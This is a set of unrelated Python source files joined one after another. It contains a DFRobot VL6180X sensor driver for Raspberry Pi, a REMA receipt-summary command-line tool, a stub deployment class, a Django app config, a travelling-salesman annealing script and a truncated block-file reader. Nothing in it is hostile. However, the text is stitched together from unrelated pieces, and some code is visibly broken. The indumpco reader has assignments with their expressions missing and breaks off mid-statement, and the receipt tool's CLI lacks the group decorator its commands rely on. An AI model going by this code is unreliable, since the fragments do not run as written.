<filename>python/raspberrypi/ # -*- coding: utf-8 -* """ file # DFRobot_VL6180X Class infrastructure, implementation of underlying methods @copyright Copyright (c) 2010 DFRobot Co.Ltd ( @licence The MIT License (MIT) @author [yangfeng]<<EMAIL>> @version V1.0 @date 2021-02-09 @get from @url """ import smbus import time import RPi.GPIO as GPIO class DFRobot_VL6180X: # IIC ADDR VL6180X_IIC_ADDRESS = 0x29 # The sensor register address VL6180X_IDENTIFICATION_MODEL_ID = 0x000 VL6180X_SYSTEM_MODE_GPIO0 = 0X010 VL6180X_SYSTEM_MODE_GPIO1 = 0X011 VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO = 0x014 VL6180X_SYSTEM_INTERRUPT_CLEAR = 0x015 VL6180X_SYSTEM_FRESH_OUT_OF_RESET = 0x016 VL6180X_SYSTEM_GROUPED_PARAMETER_HOLD = 0x017 VL6180X_SYSRANGE_START = 0x018 VL6180X_SYSRANGE_THRESH_HIGH = 0x019 VL6180X_SYSRANGE_THRESH_LOW = 0x01A VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD = 0x01B VL6180X_SYSRANGE_MAX_CONVERGENCE_TIME = 0x01C VL6180X_SYSRANGE_EARLY_CONVERGENCE_ESTIMATE = 0x022 VL6180X_SYSRANGE_MAX_AMBIENT_LEVEL_MULT = 0x02C VL6180X_SYSRANGE_RANGE_CHECK_ENABLES = 0x02D VL6180X_SYSRANGE_VHV_RECALIBRATE = 0x02E VL6180X_SYSRANGE_VHV_REPEAT_RATE = 0x031 VL6180X_SYSALS_START = 0x038 VL6180X_SYSALS_THRESH_HIGH = 0x03A VL6180X_SYSALS_THRESH_LOW = 0x03C VL6180X_SYSALS_INTERMEASUREMENT_PERIOD = 0x03E VL6180X_SYSALS_ANALOGUE_GAIN = 0x03F VL6180X_SYSALS_INTEGRATION_PERIOD = 0x040 VL6180X_RESULT_RANGE_STATUS = 0x04D VL6180X_RESULT_ALS_STATUS = 0x04E VL6180X_RESULT_INTERRUPT_STATUS_GPIO = 0x04F VL6180X_RESULT_ALS_VAL = 0x050 VL6180X_RESULT_RANGE_VAL = 0x062 VL6180X_READOUT_AVERAGING_SAMPLE_PERIOD = 0x10A VL6180X_FIRMWARE_RESULT_SCALER = 0x120 VL6180X_I2C_SLAVE_DEVICE_ADDRESS = 0x212 VL6180X_INTERLEAVED_MODE_ENABLE = 0x2A3 # The valid ID of the sensor VL6180X_ID = 0xB4 # 8 gain modes for ambient light VL6180X_ALS_GAIN_20 = 0 VL6180X_ALS_GAIN_10 = 1 VL6180X_ALS_GAIN_5 = 2 VL6180X_ALS_GAIN_2_5 = 3 VL6180X_ALS_GAIN_1_67 = 4 VL6180X_ALS_GAIN_1_25 = 5 VL6180X_ALS_GAIN_1 = 6 VL6180X_ALS_GAIN_40 = 7 # The result of the range measurenments VL6180X_NO_ERR = 0x00 VL6180X_ALS_OVERFLOW_ERR = 0x01 VL6180X_ALS_UNDERFLOW_ERR = 0x02 VL6180X_NO_ERR = 0x00 VL6180X_EARLY_CONV_ERR = 0x06 VL6180X_MAX_CONV_ERR = 0x07 VL6180X_IGNORE_ERR = 0x08 VL6180X_MAX_S_N_ERR = 0x0B VL6180X_RAW_Range_UNDERFLOW_ERR = 0x0C VL6180X_RAW_Range_OVERFLOW_ERR = 0x0D VL6180X_Range_UNDERFLOW_ERR = 0x0E VL6180X_Range_OVERFLOW_ERR = 0x0F # GPIO1 mode selection VL6180X_DIS_INTERRUPT = 0 VL6180X_HIGH_INTERRUPT = 1 VL6180X_LOW_INTERRUPT = 2 # als/range interrupt mode selection VL6180X_INT_DISABLE = 0 VL6180X_LEVEL_LOW = 1 VL6180X_LEVEL_HIGH = 2 VL6180X_OUT_OF_WINDOW = 3 VL6180X_NEW_SAMPLE_READY = 4 ''' @brief Module init @param bus Set to IICBus @param addr Set to IIC addr ''' def __init__(self,iic_addr =VL6180X_IIC_ADDRESS,bus = 1): self.__i2cbus = smbus.SMBus(bus) self.__i2c_addr = iic_addr self.__gain = 1.0 self.__atime =100 ''' @brief Initialize sensor @param CE The pin number attached to the CE @return return True succeed ;return False failed. ''' def begin(self): device_id = self.__get_device_id() if device_id != self.VL6180X_ID: return False self.__init() return True ''' @brief Configure the default level of the INT pin and enable the GPIO1 interrupt function @param mode Enable interrupt mode @n VL6180X_DIS_INTERRUPT disabled interrupt @n VL6180X_DIS_INTERRUPT GPIO1 interrupt enabled, INT high by default @n VL6180X_LOW_INTERRUPT GPIO1 interrupt enabled, INT low by default ''' def set_interrupt(self,mode): if(mode == self.VL6180X_DIS_INTERRUPT): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x20]) elif(mode == self.VL6180X_HIGH_INTERRUPT): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x10]) elif(mode == self.VL6180X_LOW_INTERRUPT): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x30]) ''' @brief A single range @return return ranging data ,uint mm ''' def range_poll_measurement(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01]) return self.range_get_measurement() ''' @brief Configuration ranging period @param period_ms Measurement period, in milliseconds ''' def range_set_inter_measurement_period(self,period_ms): if(period_ms > 10): if(period_ms < 2550): period_ms = ( period_ms / 10 ) -1 else: period_ms = 254 self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD,period_ms]) ''' @brief Configure the interrupt mode for ranging @param mode Enable interrupt mode @n VL6180X_INT_DISABLE interrupt disable @n VL6180X_LEVEL_LOW value < thresh_low @n VL6180X_LEVEL_HIGH value > thresh_high @n VL6180X_OUT_OF_WINDOW value < thresh_low OR value > thresh_high @n VL6180X_NEW_SAMPLE_READY new sample ready ''' def range_config_interrupt(self,mode): if(mode > self.VL6180X_NEW_SAMPLE_READY): return False self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO]) value = self.__i2cbus.read_byte(self.__i2c_addr) value = value | mode self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO,value]) ''' @brief Configure the interrupt mode for the ambient light @param mode Enable interrupt mode @n VL6180X_INT_DISABLE interrupt disable @n VL6180X_LEVEL_LOW value < thresh_low @n VL6180X_LEVEL_HIGH value > thresh_high @n VL6180X_OUT_OF_WINDOW value < thresh_low OR value > thresh_high @n VL6180X_NEW_SAMPLE_READY new sample ready ''' def als_config_interrupt(self,mode): if(mode > self.VL6180X_NEW_SAMPLE_READY): return False self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO]) value = self.__i2cbus.read_byte(self.__i2c_addr) value = value | ( mode << 3 ) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO,value]) ''' @brief Enable continuous ranging mode ''' def range_start_continuous_mode(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x01]) time.sleep(0.3); self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,7]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x03]) ''' @brief Retrieve ranging data @return return ranging data ,uint mm ''' def range_get_measurement(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_RANGE_VAL>>8, [self.VL6180X_RESULT_RANGE_VAL]) value = self.__i2cbus.read_byte(self.__i2c_addr) return value ''' @brief Clear ranging interrupt ''' def clear_range_interrupt(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,1]) ''' @brief Clear the ambient light interrupt ''' def clear_als_interrupt(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,2]) ''' @brief Single measurement of ambient light @return return The light intensity,uint lux ''' def als_poll_measurement(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x01]) return self.als_get_measurement() ''' @brief Obtain measured light data @return return The light intensity,uint lux ''' def als_get_measurement(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_ALS_VAL>>8, [self.VL6180X_RESULT_ALS_VAL]) a = self.__i2cbus.read_byte(self.__i2c_addr) b = self.__i2cbus.read_byte(self.__i2c_addr) value = (a<<8) | b result = ((0.32*100*value)/(self.__gain*self.__atime)) return result ''' @brief Enable continuous measurement of ambient light intensity mode ''' def als_start_continuous_mode(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01]) time.sleep(1) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,7]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x03]) ''' @brief Configure the period for measuring light intensity @param period_ms Measurement period, in milliseconds ''' def als_set_inter_measurement_period(self,period_ms): if(period_ms>10): if(period_ms<2550): period_ms = (period_ms/10) -1 else: period_ms = 254 self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD,period_ms]) ''' @brief turn on interleaved mode ''' def start_interleaved_mode(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01]) time.sleep(1) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,7]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x03]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_INTERLEAVED_MODE_ENABLE>>8, [self.VL6180X_INTERLEAVED_MODE_ENABLE,0x01]) ''' @brief Gets the interrupt state of the ranging @return return status @n 0 �?No threshold events reported @n VL6180X_LEVEL_LOW :value < thresh_low @n VL6180X_LEVEL_HIGH :value > thresh_high @n VL6180X_OUT_OF_WINDOW :value < thresh_low OR value > thresh_high @n VL6180X_NEW_SAMPLE_READY :new sample ready ''' def range_get_interrupt_status(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO>>8, [self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO]) result = self.__i2cbus.read_byte(self.__i2c_addr) result = result & 0x07 return result ''' @brief Gets the interrupt state of the measured light intensity @return return status @n 0 �?No threshold events reported @n VL6180X_LEVEL_LOW :value < thresh_low @n VL6180X_LEVEL_HIGH :value > thresh_high @n VL6180X_OUT_OF_WINDOW :value < thresh_low OR value > thresh_high @n VL6180X_NEW_SAMPLE_READY :new sample ready ''' def als_get_interrupt_status(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO>>8, [self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO]) result = self.__i2cbus.read_byte(self.__i2c_addr) result = (result>>3) & 0x07 return result ''' @brief turn off interleaved mode ''' def __stop_interleave_mode(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x01]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_INTERLEAVED_MODE_ENABLE>>8, [self.VL6180X_INTERLEAVED_MODE_ENABLE,0x00]) ''' @brief Gets validation information for range data @return Authentication information ''' def get_range_result(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_RANGE_STATUS>>8, [self.VL6180X_RESULT_RANGE_STATUS]) result = self.__i2cbus.read_byte(self.__i2c_addr)>>4 return result ''' @brief set IIC addr @param addr The IIC address to be modified ''' def set_iic_addr(self,addr): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_I2C_SLAVE_DEVICE_ADDRESS>>8, [self.VL6180X_I2C_SLAVE_DEVICE_ADDRESS,addr]) self.__i2c_addr = addr ''' @brief Initialize the sensor configuration ''' def __init(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET>>8, [self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET]) reset = self.__i2cbus.read_byte(self.__i2c_addr) if(reset): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x02, [0x07,0x01]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x02, [0x08,0x01]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x96,0x00]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x97,0xfd]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe3,0x00]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe4,0x04]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe5,0x02]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe6,0x01]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xe7,0x03]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xf5,0x02]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xd9,0x05]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xdb,0xce]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xdc,0x03]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xdd,0xf8]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x9f,0x00]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xa3,0x3c]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xb7,0x00]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xbb,0x3c]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xb2,0x09]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xca,0x09]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0x98,0x01]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xb0,0x17]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xad,0x00]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0xff,0x05]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0x00,0x05]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0x99,0x05]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xa6,0x1b]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xac,0x3e]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x01, [0xa7,0x1f]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,0x00, [0x30,0x00]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD,0x09]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_VHV_REPEAT_RATE>>8, [self.VL6180X_SYSRANGE_VHV_REPEAT_RATE,0xFF]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_VHV_RECALIBRATE>>8, [self.VL6180X_SYSRANGE_VHV_RECALIBRATE,0x01]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_MAX_CONVERGENCE_TIME>>8, [self.VL6180X_SYSRANGE_MAX_CONVERGENCE_TIME,0x31]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD,0x31]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_INTEGRATION_PERIOD>>8, [self.VL6180X_SYSALS_INTEGRATION_PERIOD,0x63]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_READOUT_AVERAGING_SAMPLE_PERIOD>>8, [self.VL6180X_READOUT_AVERAGING_SAMPLE_PERIOD,0x30]) self.set_als_gain(self.VL6180X_ALS_GAIN_1) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x20]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO,0x00]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x00]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x00]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_INTERLEAVED_MODE_ENABLE>>8, [self.VL6180X_INTERLEAVED_MODE_ENABLE,0x00]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET>>8, [self.VL6180X_SYSTEM_FRESH_OUT_OF_RESET,0]) ''' @brief Set Range Threshold Value @param thresholdL :Lower Threshold @param thresholdH :Upper threshold ''' def set_range_threshold_value(self,threshold_l,threshold_h): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_THRESH_LOW>>8, [self.VL6180X_SYSRANGE_THRESH_LOW,threshold_l]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_THRESH_HIGH>>8, [self.VL6180X_SYSRANGE_THRESH_HIGH,threshold_h]) ''' @brief Set ALS Threshold Value @param thresholdL :Lower Threshold @param thresholdH :Upper threshold ''' def set_als_threshold_value(self,threshold_l,threshold_h): value_l = int((threshold_l * self.__gain)/0.32) value_h = int((threshold_h* self.__gain)/0.32) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_THRESH_LOW>>8, [self.VL6180X_SYSALS_THRESH_LOW,threshold_l>>8,value_l]) self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_THRESH_HIGH>>8, [self.VL6180X_SYSALS_THRESH_HIGH,threshold_h>>8,value_h]) ''' @brief Set the ALS gain @param gain the value of gain(range 0-7) @n 20 times gain: VL6180X_ALS_GAIN_20 = 0 @n 10 times gain: VL6180X_ALS_GAIN_10 = 1 @n 5 times gain: VL6180X_ALS_GAIN_5 = 2 @n 2.5 times gain: VL6180X_ALS_GAIN_2_5 = 3 @n 1.57 times gain: VL6180X_ALS_GAIN_1_67 = 4 @n 1.27 times gain: VL6180X_ALS_GAIN_1_25 = 5 @n 1 times gain: VL6180X_ALS_GAIN_1 = 6 @n 40 times gain: VL6180X_ALS_GAIN_40 = 7 @return true :Set up the success, false :Setup failed ''' def set_als_gain(self,gain): if(gain>7): return False if(gain == self.VL6180X_ALS_GAIN_20): self.__gain = 20 elif(gain == self.VL6180X_ALS_GAIN_10): self.__gain = 10 elif(gain == self.VL6180X_ALS_GAIN_5): self.__gain = 5.0 elif(gain == self.VL6180X_ALS_GAIN_2_5): self.__gain = 2.5 elif(gain == self.VL6180X_ALS_GAIN_1_67): self.__gain = 1.67 elif(gain == self.VL6180X_ALS_GAIN_1_25): self.__gain = 1.25 elif(gain == self.VL6180X_ALS_GAIN_1): self.__gain = 1.0 elif(gain == self.VL6180X_ALS_GAIN_40): self.__gain = 40 gain =gain | 0x40 self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_ANALOGUE_GAIN>>8, [self.VL6180X_SYSALS_ANALOGUE_GAIN,gain]) return True ''' @brief get the identifier of sensor @return Authentication information ''' def __get_device_id(self): self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_IDENTIFICATION_MODEL_ID>>8, [self.VL6180X_IDENTIFICATION_MODEL_ID]) id = self.__i2cbus.read_byte(self.__i2c_addr) return id
###################################################################### ## Copyright (c) 2019 <NAME>, Norway ## ################################################################### ## Created : wulff at 2019-3-25 ## ################################################################### ## The MIT License (MIT) ## ## Permission is hereby granted, free of charge, to any person obtaining a copy ## of this software and associated documentation files (the "Software"), to deal ## in the Software without restriction, including without limitation the rights ## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell ## copies of the Software, and to permit persons to whom the Software is ## furnished to do so, subject to the following conditions: ## ## The above copyright notice and this permission notice shall be included in all ## copies or substantial portions of the Software. ## ## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR ## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE ## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER ## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, ## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE ## SOFTWARE. ## ###################################################################### import os import json import sys import collections import datetime import click from collections import OrderedDict import matplotlib.pyplot as plt import pandas as pd class rema: def __init__(self,file): with open(file,"r") as f: jsonobj = json.load(f) cat_fn = "categories.json" categories = None if(os.path.exists(cat_fn)): with open(cat_fn,"r") as f: categories = json.load(f) self.categories = categories self.obj = jsonobj self.oformat = "str" def printGroups(self): groups = dict() transactions = self.obj["TransactionsInfo"]["Transactions"] for t in transactions: for item in t["Receipt"]: groups[item["ProductGroupDescription"]] = " " self.printList(groups) def printOrderByGroupOrCategory(self,maxcount=10,month = False,category=False,keyName=None,plot=False,quarter=False): summary = dict() if self.categories is None and category: print("Could not find categories.json. Can't run this command") transactions = self.obj["TransactionsInfo"]["Transactions"] for t in transactions: datestr= str(t["PurchaseDate"]) d = datetime.datetime.utcfromtimestamp(int(datestr[:-3])) if(month): header_key = str(d.year) + "-" + str(d.month) elif(quarter): header_key = str(d.year) + "-Q" + str(pd.Timestamp(d).quarter) else: header_key = str(d.year) if(header_key not in summary): summary[header_key] = dict() for item in t["Receipt"]: key = item["ProductGroupDescription"] if(category and key in self.categories ): key = self.categories[key] # print(json.dumps(item,indent=4)) if(keyName and key == keyName): key = item['ProductDescription'] elif(keyName): continue if(key in summary[header_key]): summary[header_key][key] += item["Amount"] else: summary[header_key][key] = item["Amount"] self.printTransactionSummary(summary,maxcount,plot) def printTransactionSummary(self,summary,maxcount,plot): data = OrderedDict() for header_key in summary: transactions = summary[header_key] data[header_key] = list() listofTuples = sorted(transactions.items() ,reverse = True, key=lambda x: x[1]) count = 0 for s in listofTuples: if(count >= maxcount): continue else: count += 1 data[header_key].append((s[1],s[0])) if(plot): self.plotDictWithTouple(data) pass else: self.printDictWithTouple(data) def printList(self,data): """Print a list of items""" if(self.oformat == "json"): print(json.dumps(data,indent=4)) else: for el in data: print(el) def plotDictWithTouple(self,data): """Print ordered dictionary where each item is a (number,description) touple""" pdata = dict() #- Reorganize data for key in data: for el in data[key]: val = el[0] name = el[1] if name not in pdata: pdata[name] = dict() pdata[name]['yval'] = list() pdata[name]['xval'] = list() pdata[name]['yval'].append(val) pdata[name]['xval'].append(key) #with plt.xkcd(): for key in pdata: plt.plot(pdata[key]['xval'],pdata[key]['yval'],label=key) plt.xlabel('Date [n]') plt.ylabel("Kostnad [kr]") plt.legend() plt.xticks(rotation=90) plt.savefig("plot.jpg") #plt.xlim([, 1, 1),]) #plt.autoscale() def printDictWithTouple(self,data): """Print ordered dictionary where each item is a (number,description) touple""" if(self.oformat == "json"): print(json.dumps(data,indent=4)) else: for key in data: print(str(key) + ":") for el in data[key]: print("\t%.1f\t%s" %(el[0],el[1])) #---------------------------------------------------------- #- Command line interface #---------------------------------------------------------- @click.argument('data', type=click.Path(exists=True)) @click.option('--json',is_flag=True,help="Set JSON as output format") @click.pass_context def cli(ctx,data,json): ctx.ensure_object(dict) #Load the file r = rema(data) if(json): r.oformat = "json" else: r.oformat = "str" ctx.obj['rema'] = r @cli.command('list',help="Sum and list items") @click.pass_context @click.option('--maxcount',default=10,help="Number of items to list") @click.option('--month',is_flag=True,help="Sort per month") @click.option("--category",is_flag=True,help="Sort by categories.json file") @click.option("--item",help="Specify a certain group or category") @click.option("--plot",is_flag=True,help="Plot items") @click.option('--quarter',is_flag=True,help="Sort per quarter") def group(ctx,maxcount,month,category,item,plot,quarter): ctx.obj['rema'].printOrderByGroupOrCategory(maxcount,month,category,item,plot,quarter) @cli.command('listgroups',help="List all groups") @click.pass_context def listgroups(ctx): ctx.obj['rema'].printGroups() if __name__ == "__main__": cli(obj = {})
""" implements the staged deployment engine which contains the logic and order of execution """ class StagedDeploymentEngine(object): def __init__(self): raise NotImplementedError
from django.apps import AppConfig class MallsConfig(AppConfig): name = 'malls'
<filename> import re from simulated_annealing import optimizar from dominio_tsp import DominioTSP #from dominio_ag_tsp import DominioAGTSP #from algoritmo_genetico import optimizar from math import e from time import time """ temperatura = 10000 enfriamiento = [0.8,0.9,0.95,0.99] dominio = DominioTSP('datos/ciudades_cr.csv', 'Alajuela') while(temperatura < 10000000): for tasa in enfriamiento: solucion,cont = optimizar(dominio,temperatura,tasa) print("| 17 |", temperatura, "|", tasa, "|", round(solucion,3), "|", cont, "|") temperatura = temperatura/0.2 """ """ poblacion = 100 elite = 0.1 mutacion = [0.1,0.3,0.5,0.7,0.9] reps = 1000 test = False dominio = DominioAGTSP('datos/ciudades_cr.csv', 'Alajuela') # (dominio, 100, 0.1, 0.5, 1000, False) #optimizar(dominio, tam_pobl, porc_elite, prob_mut, reps, testeo): while(poblacion <= 1000): for p in mutacion: solucion = optimizar(dominio,poblacion,elite,p,reps,test) #print("poblacion: ", poblacion, ", mutacion: ", p) #print("Solucion: ", dominio.fcosto(solucion), "\n") print("| 16 |", poblacion, "|", p, "|", round(dominio.fcosto(solucion),3), "| 1000 |") poblacion = poblacion + 200 """ #Annealing: 1250000.0 0.99 1762.4 1856 #Genetico: 700 0.1 1675.0 1000 #Simualted Annealing dominio = DominioTSP('datos/ciudades_cr.csv', 'Alajuela') for i in range(0,5): # start_time = time() solucion = optimizar(dominio,1250000.0,0.99) # elapsed_time = time() - start_time #print("Elapsed time: %0.10f seconds." % elapsed_time) print (solucion) #Genetico """ dominio = DominioAGTSP('datos/ciudades_cr.csv', 'Alajuela') for i in range(0,5): start_time = time() solucion = optimizar(dominio,700,0.1,0.1,1000,False) elapsed_time = time() - start_time print("Elapsed time: %0.10f seconds." % elapsed_time) print (dominio.fcosto(solucion)) """
<filename>indumpco/<gh_stars>0 # -*- coding: utf-8 -*- import zlib import lzma import re import os class FormatError(Exception): pass def pack_idxline(seg_len, seg_sum): return "%d %s\n" % (int(seg_len), seg_sum) def unpack_idxline(idxline): hit = re.match(r'^([0-9]+) (\w+)\s*$', idxline) if not hit: raise FormatError("malformed index line", idxline) seg_len = int( seg_sum = return seg_len, seg_sum class BlockFileRead(object): def __init__(self, seg_sum, filename): self.main_seg_sum = seg_sum self.filename = filename self.fh = open(filename) self.format_byte = self.extra_idxlines = set() if self.format_byte == 'z': self.is_x_group = False elif self.format_byte == 'x': self.is_x_group = True self.x_overall_sum = self.fh.readline().strip() embedded_idxline_count = int(self.fh.readline().strip()) self.x_embedded_idxlines = [] self.x_overall_len = 0 for _ in range(embedded_idxline_count): idxline = self.fh.readline() self.x_embedded_idxlines.append(idxline) xseglen, xsegsum = unpack_idxline(idxline) self.x_overall_len += xseglen if xsegsum != self.main_seg_sum: self.extra_idxlines.add(idxline) self.x_overall_idxline = pack_idxline(self.x_overall_len, self.x_overall_sum) if 